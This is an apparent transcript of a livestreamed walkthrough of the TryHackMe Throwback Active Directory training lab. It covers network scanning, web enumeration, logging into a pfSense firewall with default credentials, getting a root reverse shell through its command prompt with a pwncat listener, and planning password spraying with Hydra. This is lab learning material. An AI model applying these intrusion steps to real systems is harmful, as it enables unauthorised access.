Hey everybody, this is a super duper long video and there is a reason for that. This is part one of me attempting and walking through and learning and going through Throwback, the new TryHackMe Networks lab environment, to kind of work through an internal penetration test of doing some Windows Active Directory stuff, and a lot of that was new for me. So it was a kind of low tempo, casual, chill stream that I originally put out on Twitch. So I hope to continue doing that. And if you guys have any interest, please do check out my Twitch channel. Hopefully I'll be able to do more streams like that that are kind of long form and chill and you can kind of see me being a goofball and, I don't know, doing a little bit more than just the normal prepackaged videos that you might see and stuff here on YouTube. So hopefully that'll be a little bit of interest for you, but if you'd like to check it out, I think it's twitch.tv/johnhammond010 and hopefully we'll be able to do more of it. I'm gonna continue up, this is part one of Throwback and I'm gonna continue to do more of it, but a lot of people ask, hey, will this be up on YouTube? And yeah, absolutely, it'll be up on YouTube. So admittedly this video might be hard to watch as a video. It's gonna be a little bit disjointed because I don't have a display up for like the chat or what people are saying and I just try to respond to them and that might seem random and ad hoc. And I also just started recording in OBS like maybe five or so minutes into the stream. So the kickoff, the start of the video is like, whoa, suddenly we're doing this, and I realize that might be a little bit disjointed, but for posterity's sake, I wanted to include this. I wanna upload it to YouTube and I wanna offer it to you. So if you have any interest, please check it out. Long, long video, but you get to see me, I don't know, letting my hair down a little bit more than I usually do in some YouTube videos. So I'd love to see you on Twitch.
We'll continue more of it hopefully and we'll do more of Throwback, but here's the video. I hope you guys enjoy this long artifact of like six hours, and it's probably gonna be even longer after the other ones. This is just part one, but we'll keep doing it and we'll learn together and it'll be a lot of fun. Thanks everybody, enjoy the video if you watch it for some reason. Take care, I'll see you soon. Let me know if the stream starts to die because I'm doing that, hopefully my computer is, hopefully my computer can handle it. This is an Active Directory forest visualized. Okay, so let's say we have a domain tryhackme.com and then other domains like east.tryhackme.com and forest, excuse me, west.tryhackme.com. Those are a hierarchy of domains and this is where I still get wonky. So you have like one domain, right? Right. And that is a tree, is that right? And then you can have other domains that are also trees and those make a forest, is that right? Help me out, chat. I got a Monster here because it's like eight o'clock at night and I'm gonna be doing this for a while. Where's the sub button? Hey, Wester, how's it going? I don't know, where is the sub button on Twitch? The domain admins are the big boss. That makes sense. They control the domains and are the only ones with access to the domain controller, that makes sense, they're an administrator. Service accounts can be domain admins. These are for the most part never used except for service maintenance, and they're required by Windows for services such as SQL, SQL to pair servers with a service account. Local administrators, these users can make changes to local machines as an administrator and may even be able to control other normal users, but they cannot access the domain controller because they're tied to that physical machine. They're tied to that computer. So in the case that you aren't in an Active Directory-controlled network, like a regular Windows computer, then you have a local administrator account.
Even if you are in a domain, you can be a local administrator on that computer, but if you're not the domain admin, you don't have control over the domain. Hence the names. So hopefully this is the first of many streams. Yeah, so I'd like to be able to do these like every night, ideally. This is kind of an interesting one-off because my girlfriend has a night shift currently at work, so I'm gonna be able to hang out and chill for a long time. Domain users are your everyday users. They can log into machines they have authorization to access, and they may have local administrator rights to the machine depending on the organization. Then we talk about policies. So domain policies are like domain groups, except instead of permissions that contain roles and instead of applying only to a group of users, the policies apply to the domain as a whole. It simply acts as a rulebook for the entire Active Directory structure that a domain admin can modify and alter as they deem necessary to keep the network running smoothly and securely. Okay, so the domain admins are the ones that can make the rulebook that is the domain policy. I will once again believe that. The options for domain policies are almost endless and a big factor for attackers when enumerating Active Directory networks. I'll outline just a few of the many policies that are default and that you can create in Active Directory. So turn off the, or like Windows Defender, turn off your little built-in antivirus. That's the thing. Digitally sign communication can disable or enable SMB signing on the domain controller. Okay. Domain services overview. Domain services are exactly what they sound like. They're services that the domain controller can provide to the rest of the domain or tree. There is a wide range of various services that can be added to a domain controller.
However, in this room we'll only be going over the default services that come when you set up a Windows server as a domain controller. I'll outline the default domain services. LDAP, that makes sense. You see that often in the Windows world, WW. Certificate services allows the domain controller to create, validate, and revoke public key certificates. I need to get smart on some of that. DNS, yeah, that's again, probably something obviously, I would think, I would expect you to find with a domain controller, knowing what it does. LLMNR, I need to get smart on that too, and NBNS, NBT-NS. So let's dive into that. One of the things I'm really, really looking forward to with this Throwback network is hopefully being able to learn a little bit more about that and get into it, so. LLMNR is a pretty famous protocol to hack. I see, that's why I need to know. Like, that's why I need to get smart on that stuff. The domain authentication overview, and that's the most important part of Active Directory. So Kerberos, right? As well as the most vulnerable part of Active Directory, that's great. Is the authentication protocols in place? There are two types of main authentication, NTLM and Kerberos. These will be covered more in depth later, great. And there is an Attacking Kerberos room. Ooh, let's click on that guy. Sweet, yeah, maybe I should pour into that soon enough. There's also a lot of info on this, okay, okay. I got a lot to learn here. Kerberos, that's the default. That uses ticket granting tickets and service tickets to authenticate users and give access to the rest of the resources throughout the domain. So you hear a lot of the time Kerberoasting, right? So I think that's kind of abusing whatever that ticket granting ticket scheme so that you could get a ticket and like card yourself in the network. I think I've heard of, like, obviously, like the golden ticket attack and the silver ticket attack. Is that a thing? Is there a silver ticket attack?
No silver play button. You can tell that's like in my recent Google searches. Look at it, look at it, he's right here. Wow, wow, wow, wow. All right, now we'll never see him again. It is a thing, it is a thing. I'll learn more about that. Is it just as nasty, just as nasty and evasive, and it's even stealthier? I'll do some reading on that. All right, unless someone in the chat just wants to like drop knowledge on the incredible thing that apparently is a silver ticket attack. Active Directory Domain Services is the main access point for attackers. Now that we understand the basics of Active Directory, we can utilize this knowledge in the lab environment and get hands-on with these concepts. All right, great, I did it, I read it, I'm good. Ooh, more scrolling. PowerShell, ooh, ooh, ooh, ooh. PowerShell is the Windows scripting language and shell environment that is built using the .NET framework. All right, now we're making a hard pivot. Took a big left turn going from what is Active Directory to now what is PowerShell. Okay, so I've actually taught PowerShell before, back in my teaching days. So it is a very verb-noun, English-like syntax. You'll have a Get and all these things that are verbs. Get-Help is a godsend. Get-Command is also a godsend because in cmd.exe you don't have a command that will tell you all the commands. So, and you can also use whatever cool globbing you want there with a wild star, wildcard, excuse me. I actually feel pretty tight on PowerShell so I don't think I wanna spend as much time in here. I'd like to get us to some real cool on-the-keyboard stuff, and I've actually put out some cursory videos on PowerShell. So, oh yeah, they're talking about the Select command, specifying first, last, unique, et cetera. And filtering with Where. You can use the question mark as an alias for Where. Wow, wow. If I recall, silver ticket is a forged ticket for a user, could be a diamond. Yeah.
Ooh, golden ticket is for, yeah, for the Kerberos ticket granting ticket, which is the big boy. I like how you put that, Western, thanks. Okay, PowerShell, PowerShell, PowerShell, offensive PowerShell. Import-Module. I guess I can like tinker with this. I don't know how well this will work if I fire up a virtual machine while I'm trying to stream and record. Let's see if my poor Dell XPS can actually handle it. I have a Windows 10 virtual machine. I don't need to create a snapshot. Let's just fire that bad boy up. Let's see if we can do it. I was actually using this machine to test some malware that we kind of found at work. So you can see my snapshots here that say "before malware," when Windows Defender was still on. All right, come on down. I know you're restoring the virtual machine, but you can at least show your face for all the kids at home. For everyone watching, look, it's Windows running on Linux. It's the LSW, Linux Subsystem for Windows. Okay, come on back. Great, we got PowerShell in here. Tell me if the stream starts to die because I realize I am running probably some hefty, hefty software on my poor Dell laptop right now. Nightwolf, hey, good to see you, my friend. Okay, Windows, just keep restarting Explorer. Realistically, I have another Windows computer beside me and I could like VNC or RDP into that, I guess. Can I click on the start button, please, PowerShell? Can I type literally anything? This is why I can't stand virtual machines, especially Windows virtual machines. Check it out. Here's my little carbon ThinkPad, X1. And if I open up the screen, you can see it has the Windows logo on it. So therefore it is automatically running Windows. Apparently we're not gonna do this. Apparently this just isn't gonna happen by Windows. So I will be able to press the "I believe" button on this, though I know the syntax for Import-Module and you could do this probably within the Linux PowerShell. But I don't think it would like do a good job.
Pwsh, as you properly pronounce PowerShell. I wanna, it's like a snap package and you gotta do that with like classic. I hate dealing with snap. That is a big gripe that I have for my Ubuntu realm. Yeah, see, like use classic, --classic. It's like, just do it, just do it, just install it. Does John use tmux? No, I do not, I should. If I were a smart, intelligent person, I would be able to type tmux. I don't even have it installed. Wow, that's embarrassing. Is pwsh just "push"? How are you supposed to pronounce that? Yeah, so that's a thing and you could import a module, maybe Import-Module. Yeah, yeah, you could do it. Obviously a lot of this stuff just isn't gonna happen though. So I think this goes to, can I actually Import-Module ActiveDirectory in this? Import module, and there's no hyphen in there? No, whack that. Yeah, and so the Linux side obviously is not gonna have any idea what that is. Like, what are you trying to do? Why are you telling me about Active Directory when I'm running a Linux kernel, buddy? But I know that that is a thing you can do, like Get-ADDomain and Get-ADForest. And we'll do this on the boxes. So I'm not extremely bummed that I can't give you a demo for that. But PowerView, obviously, part of PowerSploit, is fantastic and awesome. And I need to get a lot more familiar with it. I also started to watch some of SecurityTube or, what is it, Pentester Academy now, right? Oh, hey, anyway, hey there, I was quite hyped to learn that you were teaching at Wall of Sheep. I was there too, I was doing a D. Oh, awesome, thank you, appreciate it. Yeah, Wall of Sheep's always a lot of fun. Riverside is a great dude. I consider him a mentor to me in a lot of ways. He's cool, he's very good. And PowerSploit also has these other modules and stuff that you could do, or these other cmdlets you can run after you import the module. Did they cover that already? Did they cover the Import-Module syntax to actually run PowerView?
I would have thought there would have been a screenshot for that. Whatever, they might have. My phone is going off. Chill, casual streams. Real time with John. Oh, I got a new write-up submission on Peekill. Check it out. Cool. Yes, I know the PowerShell. Entering the breach, my friend. What do we got here? Ooh, actual things, actual stuff. Are we doing it for reals? Are we going? Your TAC team has run initial reconnaissance on the target, Throwback Hacks Security. They find that there are three machines that are publicly facing: Throwback prod, Throwback FW, Throwback mail. Your team has informed you that these assets are publicly accessible and it's your job to perform additional reconnaissance of these machines and find the way in. To accomplish this, we'll be using nmap. Ooh, I know nmap. This nmap command is very stable. Are they going to hate us if we use RustScan? What is my IP address? What is, what is, what is this running in right now, tun0, tun1. Yeah, I am connected with Throwback, am I not? Yeah, so, wait a second. Tell me what I need to run, 200X? Should I be able to actually ping that? Should I be able to actually reach that? Like now I'm just sketched out. Can RustScan use an entire subnet or is it just going to like die? This told me that I was a dot two. So is that what I need to run? Do I need to run a dot two? No, RustScan doesn't know how to do that. Give me a box IP please, please. Just for like a sanity check. Just so I like know, 138, yeah, that's a thing. Is that right? Give me something. Can you tell me my IP address, dot 24? I should be able to see the outward-facing public stuff, Throwback mail. Oh, dot 24, dot 24. I now understand. Oh, I can move this around. Incredible, 24 and that one was 232. Let me just like check that just to know: should there be ports? Should there be packets? Should there be connectivity? Should there be any response whatsoever? This is where I'm like, oh God, the world is ending. The stream is awful.
Everyone hates me. It's running. I am connected, right? Right? Am I connected? I literally see OpenVPN running. So I know that I'm going to just straight up wrestle with the stuff. Networks, Throwback. You don't think that I'm connected. Is that so? I literally see this connection restarting. You know what? Maybe when I downloaded this thing, ls Downloads, JohnHammond. It's just not a thing apparently. Okay, Networks, OpenVPN file. Let's just regenerate this bad boy. Let's let him go. Let's let him have his new love. Let's download that. Oh, you know what? It's probably wrong. Because it didn't have that hyphen throwback in there. Let's slap that in this directory and let's get removed. Let's get rid of the old troll that would totally screw me over. So now I should be able to see the OpenVPN JohnHammond.throwback with the password in there. Cool, cool, cool, cool, cool. Now can I pretty, pretty please ping? Oh my God, computers work. The way that they're supposed to. Only if you do it right. If you do it right and you don't screw it up, then it works. And that gave me an actual IP address that it should be, and not my regular TryHackMe IP address. Great, incredible. Human error, once again, ruins the day. Thanks for, thanks for bearing with me, chat. Hopefully I get to be a little bit more of a, I get to be a little bit more of a clown than when I do a regular video. I guess that's the benefit of just chilling. Let me take a quick swig of the Monster here. Now we can do the nmap scan, ping, rust. Let's just use regular nmap because I don't think RustScan will actually behave with the /24. Will he do it? IPs. Can I supply a subnet? A list of comma-separated values. I don't want that. I want to supply a subnet. Whatever. Let's use that. This guy here, 2024. And we are still 24. So yeah, let's slap that in. We could start off this video like we always do by opening up a README file and creating an nmap directory.
-sC, -sV, -oN nmap/initial on 10.224.0/24. Let's whack a -v on there. So we actually get some verbose output and see what we're up against. Hey, Sirlik, yeah, thanks so much. Of course I'm gonna enjoy it. I appreciate you coming to hang out. You can watch me completely fail at this. Yeah, California's trolling me. Now I'll use the README throughout the stream. I'll never touch it again. Great. So we can sort of peel and look behind the, oh okay, yeah, he found something. I was gonna say we can peel behind the curtain because some of these screenshots will tell us the IP addresses that we should be looking at, I think. So we've got some hosts. 219, 232, and I see a 183. That is extremely large font. Slap my name in there. Use a zero instead of an O because I'm leet. I'm just kidding. Please don't take me seriously. What day is it? It's still September 5th over here. I don't know how it is on your side of the world, but hosts, 138, 219, and there was a 138 that I already said, 219 and 232, 232, 232, 232. Bigger font. Can you guys not see that? Is my font big enough? Can you guys see this? Great, because I can't. That's why I wear glasses. Wow, John is leet. Oh, you guys are the best. Oh, I love hanging out with you guys. Okay, nmap is still going. Holy cow. I'll get those nmap scans eventually. I didn't even use -p. I didn't even use -p-. I just said give me the first coolest ports, like the most common 1000 ones. I mean, we could just dink in RustScan this if we wanted to, just get like all of the, just get all of the nmap scans running at the same time. RustScan, slap these bad boys in. I should stop saying that. rustscan.txt. Boom, ports. Ooh, WinRM. I learned that today. Not today, but I recognize that much more easily now after doing Remote from Hack The Box. I need to do some more Hack The Box. I want to jump in on some of their Pro Labs too, because this is where the good learning comes in.
And we're having fun. So is nmap still going? He is. Let's do some deductive reasoning. I'm sorry for like flailing these windows around really badly, sorry. 138 is the one that has port 53 open and port 80. Is that the IIS one? Can we assume that's IIS? Can I please load this page? Eight things we do that really confuse our dog. That's what I go to the internet for right there. Oh yeah, I'm hogging. This is probably hurting the network because I've got like super scans running right now. Yep, nmap kicks off again. Now that one is actually almost done. So certificates, pfSense. Oh, okay, sweet. 138 is our pfSense box. I should use DuckDuckGo. Yeah, that'd be a good idea. Am I good at reading and writing regex? Yeah, I think so. I hope, I hope I am. What do we got? Let's subl all this nmap initial and kind of, kind of get a better idea as to what we're really looking at. Ooh, a lot of the -v is gonna give me a sweet, sweet output of everything that's not responding. Let's nerf some of that. Okay, OpenSSH on 138. And okay, 138 we know is our pfSense box. pfSense login, good. 183 is our web server and that's the IIS. We see a domain throwback, DNS domain name throwback.local. And that's, I think, what it was asking earlier. So, and then this must be mail? Yeah, okay, yeah, obviously I see 143 and Dovecot. So that's totally mail. Incredible. We're leet hackers. We understand the results of nmap. What's the domain name? throwback.local. What's the HTTP title of the web server running on Throwback prod? Prod? Microsoft IIS? Is that what it's asking for? There's no way. No, it's not. Where's that prod boy? See if a different web server? What's the HTTP title of the web server running on Throwback prod? We found prod and he is, oh, this is Throwback Hacks. Is that right? That looks like the total number. Correct. Will this stream be saved on Twitch to watch later? Probably. Oh yeah, was I looking at like the totally wrong field?
Chat was yelling at me like, hey, it's HTTP title, you stupid John. Am I going to stream more over here on Twitch than I am on YouTube? I don't know, honestly. This might be a one-off, I don't know. I'm gonna be doing this for the next three days and I also have some gifts for you guys, for those of you that wanna hang out and chill and stay with me. I'm super duper grateful for that. I'll try and share some stuff soon. One, two, three, four, four. Are there four? No, I'm looking at mail. Yeah, is it just four? I should probably run an all-port scan, but sweet, that's right. What service is running on FWAH? SSH, DNS? Yeah, that's kind of weird. What is it? Are you just asking for pfSense? Yeah, okay, you're just asking for pfSense. What version of Apache is running on Throwback mail? We see Throwback mail as to, we should probably, I should probably keep track of those. 232 is Throwback mail, you are Throwback prod and you are Throwback FWAH. It's 2:47 a.m. Yeah, that's the, sorry. I realize the time zone is pretty awful. It's literally gonna be like two in the morning when I'm done with this too. I mean, hopefully I'll be going for a long time. Thanks for the, yeah, congrats on the YouTube accolade. Thank you so much. It's right here. I might just have to put it back on the wall with all the other stuff. Use that README. Yeah, great job, John, prove me wrong. A version of Apache, we still need that bad boy. Apache, Ctrl+F to victory. Incredible. All right, we did that. Now we can explore the caverns. We have not yet reached the realm of, that's beyond my understanding, I think. I'm okay with running nmap. You've run your scans, and now it's time to revisit the web servers and see what services are running on them. Your team decides it's best to enumerate prod, mail, and FWAH. I'm just gonna call it that forever. Enumerating web servers. It's important to do that. I guess that's all we're gonna get. Production server.
Throwback Hacks, securing what matters to you. Yeah, let's fire these up in the web browser and actually see what we're looking at here. We got our pfSense boy, but we should see what our prod looks like. That sweet, sweet Apple computer with the rainbow screensaver. We know security, lorem ipsum dolor sit amet. Summers Winters? Oh, I love that. 150 plus meetings. We didn't know we were signing up for a comedy show when we said we were gonna do TryHackMe Throwback, guys. Ooh, further inspection of the website reveals a list of employees, location of the company. I should actually probably scan some of this, sorry. I should do the real stuff that I'm supposed to do. Let's make a directory for hosts and let's make a directory for prod. So we should be able to spin off a cheesy Nikto. I guess this is probably just me doing these things out of habit. Maybe this is not exactly the direction I'm supposed to go in, but I don't see anything that's wrong with doing it. We'll also slap in a little hosts/prod. Do a little gobuster, I guess. Is there anything wrong with that? Is anyone gonna yell at me if I do some go, gobuster? And let's continue to actually look at this thing like manually, because we do have team names, so maybe that would be worthwhile to capture. Did these give me real email addresses or are these contact buttons fake? Yeah, these buttons are fake. Whatever, we can, if we're doing this like a real cool pentest, right, we should probably keep track of some people that we can cyberstalk and perform OSINT on. Summers Winters is obviously the villain in this fairy tale. Services, there is an email address that I see, and let's actually slap some markdown headers on these. So we're not just a poor man in plain text, even though we are. Work. Oh, these just bring me to different places. They don't actually do anything. Is there anything peculiar in the source code? Again, probably just habit. This is probably not something that I need to care about.
I shouldn't be making assumptions, but you guys know me. Why do I put my notes in the code tag for markdown? I don't know. Admittedly, I just kind of do that when I know there's gonna be like listing or stuff. I actually just kind of do it so that the color triggers in Sublime Text. So maybe that's it. Alrighty, did we get anything from Nikto or any of those things? phpinfo, excuse me? We just happened to have phpinfo hanging out? Incredible. Sweet. We should, I guess, make a little README in each of these here. So I'll do like a production README just to include all these notes. And that was an interesting thing that we have phpinfo just on the page. Nothing else though. Wester's saying Ctrl+F for a little flag format. Where's my flag? Where's my ROT13 base64 Caesar cipher? That's still ROT13. And then write the mail server. All right, so that's running SquirrelMail. Guest to require email, excuse me? What the heck is that? Yeah, I can go check that bad boy out. I should stop saying that. And I don't know why that like rolls off the top of my tongue when I'm producing content. Let's say cool hip things that people really like. Ooh, multiple README files. I'm in my final form. Yeah, this is my fourth evolution. Ha, ha, ha, ha, mail. Subtle README. I should slap the IP address on here too. Whack. Get out of here, VirtualBox. Okay, I can just straight up log in with this. You probably shouldn't have a username and password literally sitting on the front page, but I'm cool with it. Oh my God. I found a flag. Sweet. Thanks, thanks Firefox. Thanks for letting me copy that. The entire div. This is something that I can go put in the flag submission panel, isn't it? What's the email found in the guest inbox? That, ha, ha, you're no match for me, Throwback. What do you think? That's flag one out of 26. I'm on the road to Viridian City. Yeah, I guess I can like, another good thing to do would be keep track of like usernames and passwords.
So we should also start that list. Let's also start a flags section. And I should have probably like took note of what was actually, what is the flag in the first email with, what was it like, the guest email within the email server? Am I doing the whole room on the stream? I don't know. So obviously this is gonna be a very, very long like network to work through, not just one room. And I will go for as long as I can tonight. Don't take that out of context. I don't have anything else going on. So I'd love to hang out with you guys depending if you wanna hang out. But we're at 53 minutes in and we've gotten like a decimal 2% of the way done. Oh yeah, what was I doing? I was saying that we should start a username and password list. We found in, I need to clear out some of my, some of my Sublime Text windows. Let's throw in like a usernames.txt and let's create a little like passwords.txt, if just to keep track of some of this stuff. Great. Now we are back on solid ground. Is there anything else that we could do with this? Welcome to Throwback's guest email. I kind of just saw this flag and was like, oh my gosh, and didn't read any of this. Keep in mind what you send is not private and could potentially be viewed by anyone. Gotcha. Okay, that was the only thing in my inbox. I don't have anything sent and I'm just living as a guest right now in this email server. I'm just a poor person mooching off of someone else. As a guest. So, great. Is there anything else we need to explore here? Immediately upon visiting the Throwback firewall, we can tell it's running a new version of pfSense. As this firewall is accessible to the public, we can assume this is an outer firewall designed to keep attackers out. Your team informs you that it's your decision what target to attack first. All can be good attack paths. They suggest attacking Throwback firewall first. However, the decision is yours. Who is the CEO of Throwback Hacks? Well, that was Summers Winston.
I, excuse me, Summers Winters. I did my homework, guys. I learned the seasons in a year. Where's the company located? That was in Great Britain. I remember that. What is the guest username on the mail server? I saved that in a file. Guest password, holy cow. We're four for four, everybody. Only a thousand more to go. All right, web shells and you. Are we gonna be beating up this pfSense box? Yeah. Your team has informed you that the pfSense box may be running in a default configuration, which means gaining access is easy with the default credentials like admin and admin. Use this information to your advantage and gain access to the pfSense configuration panel before moving on. After logging into the pfSense config, wait, what? Is it literally, it's lit admin, is it, I think it's like admin, pfsense. Isn't the default password, pfSense, admin, pfsense? Or is it like pfsense, pfsense? It's loading. It's, great. Default value passwords, nothing wrong with that. It's secure. After logging into the pfSense configuration panel, we're greeted by a dashboard showcasing the status of the firewall. Is it off? M-pinger, yeah. Default password is please sub. Thanks, evil muffin. I appreciate that. Is the Game Boy yellow like a reference to something? I don't know. It reminds me of my Pokemon Yellow days, though. It reminds me of Pikachu following me around. To use pfSense to our advantage, we'll look for a command prompt or a web shell to execute commands and then get a reverse shell. There is a thing you can do, isn't there? Sudo, excuse me, what the hell is that? What? Is this like setting /etc/sudoers? All users. Can I add one of these? User. Oh, I can add a group wheel. Let me keep that in the back of my mind. What else we got? Advanced. Let me just poke around for a little bit. I'm sure this thing will guide and tell me. But I think there's something that like, you can just run a command. Dashboard, Services. Diagnostics tab. Thank you, chat. Command prompt.
Execute shell command. whoami. Dope. Can I get a little reverse shell in that? Can I like download a file? Yeah. Let's slap a little, wait a second. This thing has SSH on, doesn't it? We saw that. We did see that. I thought. Where's my nmap scan? Yeah. pfSense login with SSH open. Can I get like a root shell in there? Like an SSH? It probably won't allow me to like SSH as root though. SSH root. I should probably add these all into my /etc/hosts file too, because I'm doing a lot of stuff here. I'm gonna be keeping track of a lot of machines. Yeah. Okay, probably not. I can just add a user, but then I'd have to like put him in the file. I'll just get a stupid reverse shell. I don't know why I care so much. I just want to get a reverse shell cheat sheet. Actually, let me just cat it out from my poor man's pentest stuff. It's this bad boy. Let me do a /bin/cat, because bat is gonna try and display that in a weird way. Forgive me. Reverse shell, pwncat incoming. You know, I probably honestly should. We can try it just because you mentioned it. Let's do a little F and I always forget. What's my IP? What's my IP address? We don't need spaces there. Zoom in so the world can see my public IP address. Just kidding. Let's go, what are you feeling? What are you feeling, guys? Are you feeling quad four? Are you feeling quad five? Quad six, quad nine? One, three, three, seven to be leet. Let's go quad four. Let's roll some straight Metasploit. Oh, dude, you guys are quick on the trigger. Oh, sorry. You were like immediate. Quad eight, John. Yeah, let's get the pwncat boy in there. Get pwncat, how do I do this? How do I run pwncat? bin/activate, please do your God type on the keyboard. Source, no, now it's just Python. python -m pwncat -lp 4444. We did quad four, didn't we? Are you doing it? Are you doing it? Yeah, you're doing it. Okay, sweet. Run the command. Done. Let's see if this actually gets back with anything.
Am I using Terminator or tmux for terminal splitting? I am just using terminal, Terminator, excuse me. Why? Why? Let's just do it, regular stupid. What is going on in my, you guys can't see because my face is in the way probably. Let me just close this for, let me like turn my face off so you can admire this Jojo Jojo Jojo down here. Computers are weird. Do it again. Do you not have sh? You don't have bash. Oh no. See, pwncat would have just worked just fine if you told me that earlier. I don't need that. pwncat would look really gross, but it'll do it. I'm supposed to do it anyway. Okay, start the listener. Throw that guy in there. There we go. Now we got a shell. We just straight, yeah bash doesn't, yeah, yeah. pwncat's ready. We're on the box. What do we got? Spooks. I should, I should, I should read. Traditionally, web shells have represented to the extent of means to an end. However, they can be used in more permanent scenarios. Common limitations world includes simple command execution, simple reverse shells that can be caught with netcat, Meterpreter shells. Yep. Yeah, yeah. So I'm already root, I'm already root. You can tell by the incredible octothorpe there. Did I, yeah. Okay. In order to execute commands in a web app, firstly define our vector that executes these commands. The web shell can be a command line interface directly integrated with the web server, a limited functionality shell, or a PHP command execution shell. I'm not too concerned. What username was used to access the configuration panel? We ran admin / pfsense. What menu tab contains a command prompt? Diagnostics. Straight from the chat. They answered that themselves. Incredible. Now I've got the shell. I caught my reverse shell already. Don't forget my readme. Oh, you're right. Thanks everybody. I should keep track of that. I should keep track of my readme. Thanks for keeping me sane, guys. That gobuster scan does not need to be running anymore. We also need all of these things.
Let's make a directory for fw. The firewall. Let's make a little entry for him. We can just say throwback-fw. And owned with admin / pfsense. Default credentials. And then netcat reverse shell. Running as root with no bash. Great. Now we want to find some log files. Excuse me. Yep, yep. We got a reverse shell. I guess we didn't really need to do the whole, oh, execute PHP command ones. That's fine, whatever. Yeah, they use port 53. They had much stealthier tradecraft than I do. I literally chose port quad four. I'm like, I'm a straight bad guy apparently. What log file is found that is not a default log? What are you talking about? Are you talking about in like /var/log? /var/log, pause. Oh, flag.txt. That doesn't sound like a normal log file. You fools. That's not what it's looking for though. There's five characters there. Wet, wet. What are you asking? The hash of the user? Nightwolf has a flag.txt in /var/log. login.log. That's kind of odd. l2tps is kind of odd. I think. Derek, what is that? What even is that? Do you guys have a login.log? Oh, login.log is weird. Are you guys throwing Pokimane emoticons? PogChamp, KEKW? Yeah, let's keep track of these. /var/log/login.log. That has a little password. This guy Humphrey. I appreciate all you guys hanging out. Part of me was like, man, part of me wants to do this on YouTube because that would be kind of like, oh, it'd get the whole audience. Like rather than 47 people here, there'd be like 400, which would probably be cool. But I thought like, you know, let's just dive in. Let's just, let's get a, let's rip the Band-Aid off and get some Twitch going on. I don't have any cool like neon lights though. And I don't have like the, I don't have any of the crazy effects going on between like, oh, there's my face off on the side and there's my chat and there's a, the gift sound whenever someone throws in subs or submits bits, whatever the heck those are. I don't have any of that.
I just like, let's, let's make the content first, you know? I'm pretty homegrown. A little background music would be nice. Dude, I can sing if you want. I'm kidding. What is the name of the user that you found? Not gonna sing, guys. John will love Humphrey's last name when I get to, oh, no, Humphrey W. I'm scared. What, what could that be? What is the flag? Did the, did the prompt tell me to go to /var/log or did it just kind of like, was I, did I land in /var/log and I just not know? There's nothing wrong with it. Cause like, I think I was able to at least deduce that I'm supposed to go over to /var/log to look for log files. But, oh, someone linked a YouTube video. What is this thing? Turn my volume off. Oh God. Oh, it's Hackers. It's the hacker movie. Appreciate that clip. Do you want me to like, watch this right now on the stream? Is this the, is this the, the rabbit coming? Oh, sorry. I didn't realize that sound was on for you guys. I'm so sorry. It's replicating, eating up memory. What do I do? Type cookie, you idiot. I'll head him off at the pass. He's doing it like I do. He hits his keyboard like me. All right, give me epilepsy warnings for this thing. Thanks. Thanks for the fun, everybody. I will, I will treat YouTube links that you send in my chat with caution. Sorry, I hope that wasn't like ungodly loud. The only service that you have left to attack is a mail server. What? Wait, what? What about the web server? What happened to the web server? Am I supposed to do the web server? All right, optional, send in YouTube links now. You're sending bitly links? No, guys. Ooh. Are you sending me like awesome music to play? Some like regular trance music. So have you guys ever heard of The Midnight? They're a group that produces music that I like a lot. They're kind of chill, like kind of ambient 80s sort of thing. Okay. The only service you have left to attack is a mail server.
Are you telling me that like this password is just gonna get me into, like what is, is this a hash that I'm actually supposed to crack, by the way? Did I, you guys distracted me way, way crazy hard. No, is the music playing? I turned it off. Let me figure out how to properly Twitch first before I try to put on music for you. That hash is securitycenter. Okay. Stop distracting me, everybody. Should I just, can I just get into the web server with that though? 422? 422? Yeah. What box? 219? 219? He has a satrippant. That's not like a username though. Does Twitch streaming and says, chat, please don't distract me. Yeah, I'm sorry. I'm a jerk. The whole point of, I guess the whole point of chat is for you guys to distract me. So I'm confused. Are we supposed to be doing the web, web server? It said the last one, did I skip something? I don't think I did. Let me just try an SSH with that user. Because maybe I just straight up can. Humphrey W. Let me grab that. I guess I should add this to our list of usernames and passwords too. Humphrey W with an at sign, please. Yes. And password is securitycenter. I could type that, but I know I didn't type it wrong. And I probably hit the backspace like 70 times. So, cool. Maybe that's not what I needed. Regardless, let's throw these in our usernames. Humphrey W and securitycenter. Okay. Uh-oh. Serylix is onto me. It sounds like I should just kind of keep moving forward then. It sounds like I'm just being crazy. As usual. The only server you have left to attack is the mail server. Your team has suggested that you try password spraying using the contact list from the guest account as well as sending phishing emails to the users in the contact list. Password spraying is using one password attempt to log into a list of users, typically with a common weak password. In a realistic environment, humans are the weakest link.
If the environment has a weak password policy, oftentimes you can spray for common weak passwords based on a variation of the year. Yep, like season and year. And they offer some examples. Oh, I'm trying to make the text big enough that you guys can read it. Can you read that? Okay. The attack surface for password spraying is fairly broad. All you need is a field to submit a username and a password. And you can password spray against that login. Even if there's not a login portal, you can still sometimes password spray against it. What? Oh, Kerbrute. Okay. We're going into Burp Suite. No. No. Oh, I hate Burp Suite. I don't hate Burp Suite. We're doing this on the mail server though. I guess so. Cause that's probably a src login, isn't it? If I go, yeah, src/login.php. Oh, we just get the headers with Burp so we can use them with Hydra. That's fine. I think that's fine. Hydra is typically used as a web login brute forcer. Yeah, I know all those. I know that. I do need to go ahead and put together a better user list though. Did it cover that? No. I guess I'll just try it. I guess I'll just make stuff. So let's go over to a second pane and let's put these names together and let's just say in our usernames list, don't overwrite it, don't save it. Let's bring that over here and let's make a Rika, Rika Fox or Rika or R Fox. Same thing with Hugh Gongo. We'll do a Hugh and an H Gongo. Same thing with Jeff Davies. We'll make a Jeff and a J Davies and a Summers, Winters, a S Winters. I like that a lot and Summers. You have an account on the mail server to use. Am I misunderstanding? I could do that. Oh, I guess I could just kind of like look at their email addresses. You're incredible and I'm not. This is great. Oh, and there's a flag. Thank you, yeah. Speaking of flags, I should have submitted this one from earlier. What is the flag in the guest contacts page? I didn't even submit that. So let's take him and slap that in there.
